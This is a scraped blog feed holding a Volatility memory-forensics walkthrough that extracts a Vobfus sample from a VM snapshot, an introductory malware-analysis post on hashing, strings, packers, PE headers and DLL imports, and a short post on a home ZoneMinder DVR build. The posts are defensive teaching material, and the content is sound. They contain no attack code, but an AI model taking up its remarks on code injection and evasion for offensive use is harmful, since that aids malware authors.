<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT7Gc2nil0XkDZOmQQYHipLUk1YGYMXkZXqWghT9lojm3IbQd-X8pSGobv1rjt6a61z2e_nzAHaT3cHNQaO1vZu1VoCk0VwGWogpLE3aM7Fyz03Jol6oj1G6ixtFoh8dVm7OKOGImQZacZ/s1600/CaptureItPlus634989621369833307.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT7Gc2nil0XkDZOmQQYHipLUk1YGYMXkZXqWghT9lojm3IbQd-X8pSGobv1rjt6a61z2e_nzAHaT3cHNQaO1vZu1VoCk0VwGWogpLE3aM7Fyz03Jol6oj1G6ixtFoh8dVm7OKOGImQZacZ/s640/CaptureItPlus634989621369833307.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Before we dive more in depth, lets see if there are open internet connections (all protocols) associated with PID 3884 by using the sockscan plugin. Looks like that is a no, at least at the time the snapshot was taken. Volatility has numerous commands to detect network activity, but in this particular instance, they are unnecessary.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghwovb51rjEFSwJPCewsjLKnDELIdoiPJm7dCdV_GkdvOfMwdNK1pzgWMC3iyOf336xrj1w7v3AWZO6csl57c6dN-k4r6eXc7ljDvFFOleGIXt8KszRucafjC0eCdXzYxNkOltZrzArItZ/s1600/CaptureItPlus634989624164523154.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghwovb51rjEFSwJPCewsjLKnDELIdoiPJm7dCdV_GkdvOfMwdNK1pzgWMC3iyOf336xrj1w7v3AWZO6csl57c6dN-k4r6eXc7ljDvFFOleGIXt8KszRucafjC0eCdXzYxNkOltZrzArItZ/s640/CaptureItPlus634989624164523154.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sample output from command: <span style="font-size: x-small;">vol.py -f Desktop/VMware-Shared-Drive/D2/D2-Snapshot5.vmem dlllist -p 3884 --profile=WinXPSP3x86</span></td><td class="tr-caption"><br /></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
Next, lets try and get a little more information about PID 3884 by looking at the process's loaded DLLs using dlllist. From the snippet above we see a number of loaded DLLs. including "urlmon.dll" and "mswsock.dll" which suggest this sample does have the ability to communicate. However, we didn't see any network connectivity via the sockscan plugin. I suspect that at the time this .vmem file was generated, there wasn't any network connectivity (it was isolated from the internet, with no emulation) and thus internal connectivity checks failed.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj48B1OQcUIFj6NcmPJ5xvx69ip0sZBpF2ziKMaamhPDBBa_p4xb325bz_kEXbdL-27n_b96Ji95wSWjK9h4d0ipGkrXokN8IffyBbmw-z05YtYouo7A2X6HKsnYHuYo8-sdgElMNRSPNrx/s1600/procexedump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj48B1OQcUIFj6NcmPJ5xvx69ip0sZBpF2ziKMaamhPDBBa_p4xb325bz_kEXbdL-27n_b96Ji95wSWjK9h4d0ipGkrXokN8IffyBbmw-z05YtYouo7A2X6HKsnYHuYo8-sdgElMNRSPNrx/s640/procexedump.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Finally, lets extract PID 3884 as an .exe, which was our original goal. By simply specifying the PID (-p) and an output location, Volatility dumps a process's executable and names it according to the PID it was sourced from. The new executable has a new hash value (as would be expected): </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQEuaK-sdZY0-XV4lfseJ1e3_Pn0irKMWaF27v4MxIJdVHShgTfIHabh1_qdxMYcotBTUxbJLTzVhIfdctj7YPuEzvoUzqkG1x8ZiebQAv81ktq3su4tih_Pj4s56IF1LGP0jHJkRQtBR/s1600/CaptureItPlus634989632125148476.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQEuaK-sdZY0-XV4lfseJ1e3_Pn0irKMWaF27v4MxIJdVHShgTfIHabh1_qdxMYcotBTUxbJLTzVhIfdctj7YPuEzvoUzqkG1x8ZiebQAv81ktq3su4tih_Pj4s56IF1LGP0jHJkRQtBR/s400/CaptureItPlus634989632125148476.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Lets check VirusTotal before we go any further.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXYsWC3Iuuyx3JltGxPfYJcdQzhWb6j9_5Si5zrMrQWMo190G1uGx0ZgnbafdrgQNVfTRwH17iQthxXZfK2ECglXMeKXPkF7t09XtyDJ8y45eetakxL-jovoxVbW_usxAyY7xYEZ3W6COG/s1600/CaptureItPlus634989633053071550.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXYsWC3Iuuyx3JltGxPfYJcdQzhWb6j9_5Si5zrMrQWMo190G1uGx0ZgnbafdrgQNVfTRwH17iQthxXZfK2ECglXMeKXPkF7t09XtyDJ8y45eetakxL-jovoxVbW_usxAyY7xYEZ3W6COG/s400/CaptureItPlus634989633053071550.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now to compare it against the original file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
That is a pretty substantial difference in detection! The original sample, if identified, is labelled as a dropper component. However, the sample extracted from memory is identified by numerous vendors as a variant of Vobfus aka. W32/Autorun and Changeup. Pretty cool! It looks like we have successfully extracted a sample and worked around its protection mechanism by utilizing the Volatility framework. We also got a bit of additional information from the dlllist plugin as static analysis of the original file was unable to enumerate the PE Imports!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-30482329280854658912013-02-24T17:49:00.001-08:002013-02-24T17:49:46.741-08:00Malware Analysis 101 [Part 3]<div dir="ltr" style="text-align: left;" trbidi="on">
<u><br /></u>
Finally, here's the concluding portion of Malware Analysis 101. Both previous posts can be found <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-1.html">here [Part 1]</a> and <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-2.html">here [Part 2]</a>.<br />
<u><br /></u>
<u></u><br />
<a name='more'></a><u><br /></u><br />
<u>Hashing:</u><br />
<u><br /></u>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxbk8xntUmv9CzKvrIdtI2UbHnqdWh3mASAlKVKQz_FFe16XObfv84VzIEpp4kT0i5erYitmTogu01ttHzWbk1Ai5FgSSyTxURmcjlaZ21ZMTwzXc6nrqp7-bUe4VkcH9pNH4lhzXT7a2v/s1600/Slide13.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxbk8xntUmv9CzKvrIdtI2UbHnqdWh3mASAlKVKQz_FFe16XObfv84VzIEpp4kT0i5erYitmTogu01ttHzWbk1Ai5FgSSyTxURmcjlaZ21ZMTwzXc6nrqp7-bUe4VkcH9pNH4lhzXT7a2v/s320/Slide13.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://opinit.files.wordpress.com/2010/07/digital-fingerprint.jpg">Image Source</a></td></tr>
</tbody></table>
A fundamental problem of communication (and language in general) is the concept of naming an object in order to identify it. Identifying individual samples is accomplished via a mechanism known as cryptographic hashing. The basic definition of hashing is: "an algorithm that takes an arbitrary block of data and returns a fixed-size bit string, the (cryptographic) hash value, such that any (accidental or intentional) change to the data will (with very high probability) change the hash value. The data to be encoded are often called the "message," and the hash value is sometimes called the message digest or simply digest."[<a href="https://en.wikipedia.org/wiki/Cryptographic_hash">source</a>] Typically, one of two (sometimes both) algorithims are used: MD5 (Message-Digest Algorithm 5) or SHA-1 (Secure Hash Algorithm). Due to some inherent weaknesses in MD5, many organizations have switched to SHA-1. That said, MD5 is still very common and is likely to remain so for quite some time. Generating a hash for any file is relatively simple and there are numerous methods available across various Operating Systems. Some of these methods are:<br />
<br />
1) *Nix CLI tool "md5sum" or "sha1sum" simple provide a filename and the tool outputs a cryptographic hash based on the alogrithm of your choosing.<br />
<br />
2) Windows CLI tool "md5deep" (iincludes functionality for SHA-1 and others). Similar functionality to the *Nix flavor tools. Available <a href="http://md5deep.sourceforge.net/">here</a>.<br />
<br />
<u>Reputational Analysis:</u><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinH2V3wwqlQcYI2dMGkoslfmHXXq38PxsIPb1PHwyEG_jBy6r7FmYV1scUh2F3LgvfOzNvaiweJBuVSTZZQ_xOJMdSEhWMZOkP9wfLVkHlhLgwJ86UX2xxKg9ewcF0eolXo_Zz579Z2O56/s1600/Slide14.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinH2V3wwqlQcYI2dMGkoslfmHXXq38PxsIPb1PHwyEG_jBy6r7FmYV1scUh2F3LgvfOzNvaiweJBuVSTZZQ_xOJMdSEhWMZOkP9wfLVkHlhLgwJ86UX2xxKg9ewcF0eolXo_Zz579Z2O56/s320/Slide14.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.searchenginepeople.com/wp-content/uploads/2011/01/reputation.jpg">Image Source</a></td></tr>
</tbody></table>
<u><br /></u>
When researching a sample, one of the simplest paths to an answer is to simply search for one out on the internet. It is entirely possible that you are not the first person to question the integrity of "butts.jpg.exe". The fundamental follow up to "I don't know" should generally be "I'll <a href="http://encrypted.google.com/">Google</a> it." Use the information you have already gleaned from initial, static analysis to construct intelligent query (ex: Cryptographic Hash is likely to give better results than simply utilizing the file name of a sample). Google the hash, Google the source if you have that information. The remainder of the tools on this list concern the reputation of the source itself, which is generally a very good indicator of the nature of the sample. As always, the "rule of thumb" is to use more than one tool to gather information. The exception is "factual information" such as associated IPs and Whois information, as this isn't likely to change between reporting sites.<br />
<br />
Sites Listed on the Slide:<br />
<a href="http://malc0de.com/">malc0de.com</a><br />
<a href="http://malwaredomains.com/">malwaredomains.com</a><br />
<a href="http://malwaredomainlist.com/">malwaredomainlist.com</a><br />
<a href="http://ipvoid.com/">ipvoid.com</a><br />
<a href="http://urlvoid.com/">urlvoid.com</a><br />
<a href="http://mywot.com/">mywot.com</a><br />
<a href="http://robtex.com/">robtex.com</a><br />
<a href="http://encrypted.google.com/">encrypted.google.com</a><br />
<br />
<u>Strings:</u><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpYhca8NFAfF0M29KzIL43x5_RLTOVsTwM1KepcW_6AL8ohF2kwQFJshjlhQ-crHHYK7BjfoTG27-cEa8yVG8lPy7TGztFoTCSm7xhz4CuFtauT3dXfAPmWqKD93TV7gXElXFIDy40bnI4/s1600/Slide15.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpYhca8NFAfF0M29KzIL43x5_RLTOVsTwM1KepcW_6AL8ohF2kwQFJshjlhQ-crHHYK7BjfoTG27-cEa8yVG8lPy7TGztFoTCSm7xhz4CuFtauT3dXfAPmWqKD93TV7gXElXFIDy40bnI4/s320/Slide15.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.xxcoder.net/wordpress/wp-content/uploads/2011/03/string_code_contains_dragons.png">Image Source</a></td></tr>
</tbody></table>
<u></u><br /><u></u>
<br />
A string is a sequence of characters, 3 or greater like "the". Searching the strings of a program is a simple, but powerful way to examine the functionality of a program. Oftentimes, Function Imports and API calls, as well as hardcoded URLs and other useful information are available with a simple search! This functionality exists with the command (you guess it) "strings" in Linux. For windows based Operating systems the free program "Strings" is available and provides nearly identical functionality as its Linux counterpart: both tools searche for both ASCII and Unicode formatted strings within an Executable. The primary difference in ASCII and Unicode formatting is the usage of NULL terminators to indicate the end of a string. Where ASCII storage sees a series of letters "example B A D" capped off by a NULL value to identify the end of a string, Unicode marks each the end of each character value with a NULL, and further caps off the entire string with two NULL values.<br />
Searching an Executable for strings ignores context, so it is possible that a Function call or interesting value is actually irrelevant. Additionally there are cases where a sequence of 3 or more characters isn't a string, sometimes the bytes mistaken by strings as a character are actually a memory address; fortunately it is very easy to identify erroneous strings.<br />
The most interesting bit of data, at least for our purposes, are the Windows function strings. They are all similarly formatted In that they begin with a capital Letter, contain no spaces, and each subsequent word starts with a capital letter.<br />
Very easy to identify and extremely well documented in the MSDN (Google Search Galore!).<br />
Common Examples include:<br />
LoadLibrary - Which loads a DLL into a process that may NOT have been loaded at the time the program started. Common among nearly every Win32 Program.<br />
GetProcAddress - Retrieves the address of a function in a DLL loaded in memory. This can be used to locate and modify code into a module or to find a location to inject code.<br />
<br />
<u><br /></u>
<u><br /></u>
<u>Packed vs. Unpacked (at a glance):</u><br />
<u><br /></u>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjmAzZv20q_qtfdDsMNfpvOAp2TYoLlu2X6JyFsA61lyfGEcK1QKu-gKVDEv0YbCZvwHCUSh7sC9TduecXUZkFcTm80h9SvHGWesxKw0cKcXViSXZNvdRZjVRX186TzqSJlZ52kIEovjUK/s1600/Slide16.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjmAzZv20q_qtfdDsMNfpvOAp2TYoLlu2X6JyFsA61lyfGEcK1QKu-gKVDEv0YbCZvwHCUSh7sC9TduecXUZkFcTm80h9SvHGWesxKw0cKcXViSXZNvdRZjVRX186TzqSJlZ52kIEovjUK/s320/Slide16.PNG" width="320" /></a></div>
Packing of a file is a technique used by Malware authors specifically to make analysis more difficult (although it does hinder detection somewhat as well). Packing a program is considered a subset of obfuscation, and in general is a major hindrance to static analysis. Fortunately its being packed is a good reason to be suspicious. Legitimate executables generally include a large number of strings; if a program is packed, the number of strings is going to be fairly low, which is what you'd expect as you are only really seeing the strings output of the initial wrapper code. Packed executables will need more advanced techniques to be fully<br />
<br />
An in-depth discussion of Packers can be found <a href="http://bandwidthco.com/whitepapers/compforensics/malware/virus-worms/Classification%20of%20Packed%20Executables%20for%20Accurate%20Computer%20Virus%20Detection.pdf">here</a> (warning, PDF).<br />
For an example of a packer, albeit one used by legitimate authors as well, here is <a href="http://upx.sourceforge.net/">UPX</a> (Link goes to sourceforge).<br />
<br />
<u>PE Headers:</u><br />
<u><br /></u>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiK7QKAKxpXaqGuNGMk44sNDcXa3OT5AK9H6J_vwzPwqDYeRGtDUV_eULrzhZUKGBGVeawtu5z8wX3jL-hjLFWhbLiJN3nZ5ofhv5LG_d3U7yBkhegfVud6EMlgQyXtdXRmPWYNhzaufC/s1600/Slide17.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiK7QKAKxpXaqGuNGMk44sNDcXa3OT5AK9H6J_vwzPwqDYeRGtDUV_eULrzhZUKGBGVeawtu5z8wX3jL-hjLFWhbLiJN3nZ5ofhv5LG_d3U7yBkhegfVud6EMlgQyXtdXRmPWYNhzaufC/s320/Slide17.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image Source: <span style="font-size: x-small;">hexdump –C <file> | head</span></td><td class="tr-caption"><span style="font-size: x-small;"><br /></span></td></tr>
</tbody></table>
<br />
For static analysis, the PE file headers are a treasure trove of information. Besides containing Imports and Exports the header contains Time and Date Stamps (which can be altered by the compiler), file metadata, and the various sections:<br />
<br />
<ol style="text-align: left;">
<li>.text - CPU executed instructions</li>
<li>.rdata - Import and Export information</li>
<li>.data - Global Data (accessible from any part of the program)</li>
<li>.rsrc - Resources used by the executable that are considered seperate from the file itself. Icons, images, menus, and strings are commonly located here.</li>
</ol>
<br />
This isn't an all inclusive list, but a snapshot of the interesting sections. These sections are what provide the majority of the information displayed by tools like <a href="http://www.dependencywalker.com/">Dependency Walker</a> and <a href="http://wjradburn.com/software/">PEview</a>. This information is of the utmost importance when trying to assemble an overall contextual view and opinion of the file being analyzed.<br />
<u><br /></u>
<u>Linked Libraries and Functions:</u><br />
<u><br /></u>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAV2ksR9dXRGATq0asEaIHYQDHOHgBhURSW0mWU7oVUUDqFwzW5EZZ8JVFdJfE1yJ8LyJBnqHR1QcoN27sBec2zIMcm0W1e7dOKTmRZNwfDRkELlu8zkcFeKOSikW6pQuX2raSd6ftueS2/s1600/Slide18.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAV2ksR9dXRGATq0asEaIHYQDHOHgBhURSW0mWU7oVUUDqFwzW5EZZ8JVFdJfE1yJ8LyJBnqHR1QcoN27sBec2zIMcm0W1e7dOKTmRZNwfDRkELlu8zkcFeKOSikW6pQuX2raSd6ftueS2/s320/Slide18.PNG" width="320" /></a></div>
Imported functions are the key to basic static analysis. They are the backbone on which analysts can make informed decisions about an executable. An import is a function used by one program that are actually stored in another program (for example a DLL often called by the Windows Installer is run32.dll) this connection is called linking. There are 3 primary ways in which libraries can be linked:<br />
<br />
<ol style="text-align: left;">
<li>Static - Original Function copied to the executable.</li>
<li>Runtime - Commonly used by packed.obfuscated malware; "ad-hoc" function calling through the use of popular functions like LoadLibrary and </li>
<li>Dynamic - Libraries are loaded at the time of program execution. (Most Common)</li>
</ol>
<br />
Identification of the libraries used is useful for hypothesizing what a program is meant to do. For example: imports from "Shell32.dll" can indicate that a file can launch other programs, while not malicious on its own, this does give us reason to be suspicious. Tools like the previously referenced <a href="http://www.dependencywalker.com/">DependencyWalker</a> are extremely useful in exploring the capabilities of an executable.<br />
<br />
Below is a list of common DLLs and their functionality. This list was constructed by the authors of "<a href="http://nostarch.com/malware">Practical Malware Analysis</a>" (Sikorski & Honig, 2012, Page 17).<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; mso-yfti-tbllook: 1536; width: 488px;">
<colgroup><col style="mso-width-source: userset; width: 55pt;" width="73"></col>
<col style="mso-width-source: userset; width: 311pt;" width="415"></col>
</colgroup><tbody>
<tr height="23" style="height: 16.99pt; mso-height-source: userset;">
<td class="oa1" height="23" style="height: 16.99pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt; font-weight: bold;">DLL</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt; font-weight: bold;">Description</span></div>
</td>
</tr>
<tr height="49" style="height: 36.83pt; mso-height-source: userset;">
<td class="oa1" height="49" style="height: 36.83pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Kernel32.dll</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">This
is a very common DLL that contains core functionality, such as access</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">and
manipulation of memory, files, and hardware.</span></div>
</td>
</tr>
<tr height="49" style="height: 36.83pt; mso-height-source: userset;">
<td class="oa1" height="49" style="height: 36.83pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Advapi32.dll</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">This
DLL provides access to advanced core Windows components such</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">as
the Service Manager and Registry.</span></div>
</td>
</tr>
<tr height="63" style="height: 47.04pt; mso-height-source: userset;">
<td class="oa1" height="63" style="height: 47.04pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">User32.dll</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">This
DLL contains all the user-interface components, such as buttons, scroll</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">bars,
and components for controlling and responding to user actions.</span></div>
</td>
</tr>
<tr height="35" style="height: 26.61pt; mso-height-source: userset;">
<td class="oa1" height="35" style="height: 26.61pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Gdi32.dll</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">This
DLL contains functions for displaying and manipulating graphics.</span></div>
</td>
</tr>
<tr height="131" style="height: 98.1pt; mso-height-source: userset;">
<td class="oa1" height="131" style="height: 98.1pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Ntdll.dll</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">not
import this file directly, although it is always imported indirectly by</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Kernel32.dll.
If an executable imports this file, it means that the author</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">intended
to use functionality not normally available to Windows programs.</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Some
tasks, such as hiding functionality or manipulating processes,</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">will
use this interface.</span></div>
</td>
</tr>
<tr height="63" style="height: 47.04pt; mso-height-source: userset;">
<td class="oa1" height="63" style="height: 47.04pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">WSock32.dll
and</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Ws2_32.dll</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">These
are networking DLLs. A program that accesses either of these most</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">likely
connects to a network or performs network-related tasks.</span></div>
</td>
</tr>
<tr height="49" style="height: 36.83pt; mso-height-source: userset;">
<td class="oa1" height="49" style="height: 36.83pt; width: 55pt;" width="73">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">Wininet.dll</span></div>
</td>
<td class="oa1" style="width: 311pt;" width="415">
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">This
DLL contains higher-level networking functions that implement</span></div>
<div style="direction: ltr; margin: 0pt 0in; unicode-bidi: embed; vertical-align: top; word-break: normal;">
<span style="font-family: Calibri; font-size: 9pt;">protocols
such as FTP, HTTP, and NTP.</span></div>
</td>
</tr>
</tbody></table>
<br />
<u>References:</u><br />
<br />
Here is a dump of all the references I have not mentioned or linked to specifically (no particular order):<br />
<br />
<br />
<ul style="text-align: left;">
<li>Practical Malware Analysis – Michael Sikorski and Andrew Honig (Available at no starch press)</li>
<li>Kahu Security - http://www.kahusecurity.com/</li>
<li>Malware Analyst’s Cookbook – Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard</li>
<li>Zeltser.com/remnux – Lenny Zeltser’s R(everse) E(ngineering) M(alware) distro</li>
</ul>
<div>
Hopefully they help you as much as they helped me.</div>
<div>
<br /></div>
<div>
I hope you enjoyed this series. Check back for more stuff soon!</div>
<br />
<div>
<br /></div>
<br />
<br />
<br />
<u><br /></u>
<u><br /></u></div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-67816641193874316772013-02-17T08:14:00.001-08:002013-02-17T08:14:06.071-08:00An unexpected weekend project that went very well.We all have these unexpected projects. This week I was given a surveillance DVR that had seen better days. The primary hard disk had spun a bearing (hehe). It was a system I built a number of years ago for my family. Previously I used the software that came with the capture card, a generic 4 channel bt878 card. The software ran on Windows XP so from the start I never really expected anything long lasting although it did last about 5 years.<br />
<br />
Anyways, enough about what it was. I dug up a 4Gb USB flash drive, installed a very basic CenOS 6 install, got x264, FFmpeg, ZoneMinder, MySQL, PHP and Apache and made it a reliable surveillance server now. It does have a 1Tb drive for the video.<br />
<br />
I have to say the ZoneMinder software is not anything fancy by first appearance but supports all the features that most expensive commercial solutions offer. I like that it did not require me to install any GUI environment on the device itself. No resources wasted on this build.<br />
<br />
<br />
<span style="font-size: x-small;">[root@cam ~]# uptime</span><br />
<span style="font-size: x-small;"> 11:09:56 up 1 day, 23:04, 2 users, load average: 0.00, 0.18, 0.22</span><br />
<span style="font-size: x-small;">[root@cam ~]# ps ax | grep zm[ac]</span><br />
<span style="font-size: x-small;">12795 ? S 0:04 /usr/bin/perl -wT /usr/local/bin/zmaudit.pl -c</span><br />
<span style="font-size: x-small;">12931 ? S 46:47 /usr/local/bin/zmc -d /dev/video0</span><br />
<span style="font-size: x-small;">16011 ? S 131:08 /usr/local/bin/zma -m 5</span><br />
<span style="font-size: x-small;">16192 ? S 35:39 /usr/local/bin/zmc -d /dev/video1</span><br />
<span style="font-size: x-small;">16204 ? S 126:37 /usr/local/bin/zma -m 6</span><br />
<span style="font-size: x-small;">16231 ? S 35:32 /usr/local/bin/zmc -d /dev/video2</span><br />
<span style="font-size: x-small;">16243 ? S 120:07 /usr/local/bin/zma -m 7</span><br />
